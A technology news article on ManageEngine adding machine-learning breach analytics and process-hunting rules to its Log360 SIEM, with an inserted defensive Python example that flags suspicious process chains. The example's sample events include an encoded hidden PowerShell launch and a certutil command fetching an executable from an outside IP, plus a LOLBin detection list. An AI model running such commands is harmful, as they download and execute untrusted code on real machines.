IT Brief New Zealand - Technology news for CIOs & IT decision-makers
ManageEngine unveils machine learning feature in Log360 for rapid breach response
Fri, 23rd Feb 2024

ManageEngine, the enterprise IT management arm of Zoho Corporation, has announced the release of a machine learning (ML)-powered exploit triad analytics feature in its Security Information and Event Management (SIEM) solution, Log360, to address the growing need for faster breach responses.

This feature, unveiled at the ManageEngine User Conference held at The Ritz-Carlton, Dubai International Financial Centre, gives enterprises the ability to trace an adversary's path and contain breaches by providing complete contextual visibility into the exploit triad: users, entities, and processes.

Manikandan Thangaraj, Vice President of ManageEngine, cited statistics on data breaches. "Today's cyber threats masterfully blend into the fabric of legitimate activity, weaponising stolen credentials, mimicking trusted processes, and exploiting human vulnerabilities," said Thangaraj. He added, "It takes an alarming 277 days to identify and contain a data breach, with expenses surging by 23% after surpassing the 200-day mark."

Thangaraj said the ML feature aims to dramatically reduce the breach life cycle. "By offering a dynamic tapestry of insights into user attributes, process lineage, and threat intelligence, Log360's ML-powered exploit triad analytics transcends merely assisting detection to enabling better comprehension. This makes it a game-changer in reducing the breach life cycle," said Thangaraj.

The enhancement to Log360's threat detection and incident response module, Vigil IQ, is intended to address the multi-faceted nature of cyber threats. The upgrade integrates user, device, and process analytics, all accessible from a single console, so that analysts have the detail they need at hand during security investigations.

Other additions to Log360 include ML-powered contextual data enrichment and a process hunting suite. The former gives Log360 a contextual analysis layer that draws on User and Entity Behaviour Analytics (UEBA), process tree visualisation, and risk scoring of IPs, URLs, and domains. The process hunting suite pairs process tree hunting with correlation rules that flag the launch of suspicious processes.

The updated Vigil IQ also ships a correlation package for prevalent attacker tools and living-off-the-land (LOTL) threats, with more than 100 out-of-the-box correlation rules for detecting them.
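The process-lineage and LOTL correlation described in the two paragraphs above can be illustrated in a few lines. The following is an added example written for this article, not ManageEngine's or Log360's code; it assumes Sysmon-style process-creation fields (pid, ppid, image, command line), a small hand-picked list of Office applications and LOLBins, and constructed sample events that include one benign tree and one Office-to-PowerShell chain plus a certutil download.

```python
"""Process-lineage correlation over constructed process-creation events.

Added illustration, not Log360's code. Assumes Sysmon-style fields
(pid, ppid, image, cmdline) and a hand-written LOLBin / Office list.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


# Constructed sample events: a benign explorer tree, a LOTL chain
# (Office document -> cmd -> encoded PowerShell) and a certutil download.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(400, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(1200, 400, "winword.exe", 'winword.exe "invoice.docm"'),
    ProcEvent(1340, 1200, "cmd.exe", "cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"),
    ProcEvent(1388, 1340, "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA"),
    ProcEvent(1500, 400, "chrome.exe", "chrome.exe"),
    ProcEvent(1600, 400, "cmd.exe", "cmd.exe /c dir"),
    ProcEvent(1700, 1600, "certutil.exe",
              "certutil -urlcache -split -f http://198.51.100.7/a.exe a.exe"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "certutil.exe", "wscript.exe", "cscript.exe", "bitsadmin.exe"}


def build_tree(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    """Index events by pid so parents can be looked up in O(1)."""
    return {e.pid: e for e in events}


def lineage(tree: Dict[int, ProcEvent], pid: int) -> List[ProcEvent]:
    """Return [self, parent, grandparent, ...], stopping at a missing parent
    or a pid already visited (guards against pid reuse producing a cycle)."""
    chain: List[ProcEvent] = []
    seen = set()
    cur = tree.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = tree.get(cur.ppid)
    return chain


def correlate(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Apply three lineage/LOTL rules; each alert is (pid, rule, evidence)."""
    tree = build_tree(events)
    alerts: List[Tuple[int, str, str]] = []
    for e in events:
        chain = lineage(tree, e.pid)
        ancestors = {a.image for a in chain[1:]}
        cl = e.cmdline.lower()
        # Rule 1: a LOLBin anywhere beneath an Office process (any depth).
        if e.image in LOLBINS and ancestors & OFFICE_APPS:
            alerts.append((e.pid, "office_spawns_lolbin",
                           " <- ".join(p.image for p in chain)))
        # Rule 2: PowerShell launched with an encoded command.
        if e.image == "powershell.exe" and " -enc" in cl:
            alerts.append((e.pid, "encoded_powershell", e.cmdline))
        # Rule 3: certutil abused as a downloader.
        if e.image == "certutil.exe" and "-urlcache" in cl and "http" in cl:
            alerts.append((e.pid, "certutil_download", e.cmdline))
    return alerts


if __name__ == "__main__":
    for pid, rule, evidence in correlate(SAMPLE_EVENTS):
        print(f"pid={pid} rule={rule} evidence={evidence}")
```

Rule 1 walks the whole ancestry rather than checking only the direct parent, which is why the intermediate cmd.exe does not hide the Office origin of the PowerShell process; in a real pipeline the pid/ppid join would be keyed on process GUIDs as well, since pids are reused.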

An integration with VirusTotal, one of the leading threat intelligence services, extends the Advanced Threat Analytics feature with additional visibility into external threats and risk analysis. Together, these additions aim to equip enterprises with the tools they need to navigate an increasingly difficult cybersecurity landscape.